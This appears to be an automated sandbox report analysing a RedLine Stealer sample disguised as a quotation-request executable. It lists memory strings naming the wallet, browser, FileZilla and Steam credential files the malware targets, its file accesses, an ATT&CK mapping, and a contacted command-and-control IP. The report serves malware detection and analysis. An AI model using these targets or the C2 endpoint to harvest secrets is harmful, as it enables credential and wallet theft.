                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363139999.000000000356C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363139999.000000000356C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumX
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363139999.000000000356C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278120947.00000000038B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SQLCOLUMNENCRYPTIONKEYSTOREPROVIDERD724855F
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.RFQ - FYKS - 06052022.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257515247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.361370195.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257103376.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RFQ - FYKS - 06052022.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RFQ - FYKS - 06052022.exe PID: 6428, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.RFQ - FYKS - 06052022.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257515247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.361370195.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257103376.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RFQ - FYKS - 06052022.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RFQ - FYKS - 06052022.exe PID: 6428, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts221
                        Windows Management Instrumentation                        		Path Interception111
                        Process Injection                        		11
                        Masquerading                        		1
                        OS Credential Dumping                        		331
                        Security Software Discovery                        		Remote Services1
                        Archive Collected Data                        		Exfiltration Over Other Network Medium1
                        Encrypted Channel                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts1
                        Native API                        		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                        Disable or Modify Tools                        		LSASS Memory11
                        Process Discovery                        		Remote Desktop Protocol3
                        Data from Local System                        		Exfiltration Over Bluetooth11
                        Non-Standard Port                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)231
                        Virtualization/Sandbox Evasion                        		Security Account Manager231
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                        Non-Application Layer Protocol                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput CaptureScheduled Transfer2
                        Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Hidden Users                        		LSA Secrets1
                        Remote System Discovery                        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common2
                        Obfuscated Files or Information                        		Cached Domain Credentials123
                        System Information Discovery                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items2
                        Software Packing                        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                        Timestomp                        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        No Antivirus matches

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        1.0.RFQ - FYKS - 06052022.exe.400000.6.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.2.RFQ - FYKS - 06052022.exe.400000.0.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.RFQ - FYKS - 06052022.exe.400000.8.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.RFQ - FYKS - 06052022.exe.400000.4.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.RFQ - FYKS - 06052022.exe.400000.12.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.RFQ - FYKS - 06052022.exe.400000.10.unpack100%AviraHEUR/AGEN.1216612Download File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://service.r0%URL Reputationsafe
                        http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                        http://tempuri.org/t_0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                        http://go.micros0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                        https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                        http://185.222.58.90:179100%Avira URL Cloudsafe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                        http://tempuri.org/00%URL Reputationsafe
                        http://support.a0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironmentme80%Avira URL Cloudsafe
                        http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                        http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                        https://helpx.ad0%URL Reputationsafe
                        http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnviron0%URL Reputationsafe
                        https://get.adob0%URL Reputationsafe
                        http://185.222.58.90:10%Avira URL Cloudsafe
                        http://185.222.58.90:17910/0%Avira URL Cloudsafe
                        http://185.222.58.90:1791080%Avira URL Cloudsafe
                        http://forms.rea0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ip.sb
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://185.222.58.90:17910/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabRFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drfalse
                            		high
                            http://service.rRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drfalse
                              		high
                              https://support.google.com/chrome/?p=plugin_wmpRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://support.google.com/chrome/answer/6258784RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/Endpoint/EnvironmentSettingsRFQ - FYKS - 06052022.exe, 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/t_RFQ - FYKS - 06052022.exe, 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/envelope/RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://support.google.com/chrome/?p=plugin_flashRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/envelope/DRFQ - FYKS - 06052022.exe, 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://support.google.com/chrome/?p=plugin_javaRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Endpoint/VerifyUpdateResponseRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://go.microsRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentRFQ - FYKS - 06052022.exe, 00000001.00000002.363207933.00000000035D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentResponseRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Endpoint/GetUpdatesRFQ - FYKS - 06052022.exe, 00000001.00000002.362669805.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.362613238.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://support.google.com/chrome/?p=plugin_realRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.ipify.orgcookies//settinString.RemovegRFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                            • URL Reputation: safe
                                            		unknown
                                            http://185.222.58.90:17910RFQ - FYKS - 06052022.exe, 00000001.00000002.362669805.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.interoperabilitybridges.com/wmp-extension-for-chromeRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://support.google.com/chrome/?p=plugin_pdfRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://support.google.com/chrome/?p=plugin_divxRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_SlRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Endpoint/VerifyUpdateRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://tempuri.org/0RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://forms.real.com/real/realone/download.html?type=rpsp_usRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://support.aRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://tempuri.org/Endpoint/SetEnvironmentme8RFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ipinfo.io/ip%appdata%RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.google.com/chrome/?p=plugin_quicktimeRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Endpoint/CheckConnectResponseRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.datacontract.org/2004/07/RFQ - FYKS - 06052022.exe, 00000001.00000002.362768565.000000000335F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://helpx.adRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drfalse
                                                                    		high
                                                                    http://tempuri.org/Endpoint/CheckConnectRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchRFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drfalse
                                                                      		high
                                                                      http://tempuri.org/Endpoint/SetEnvironRFQ - FYKS - 06052022.exe, 00000001.00000002.363207933.00000000035D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
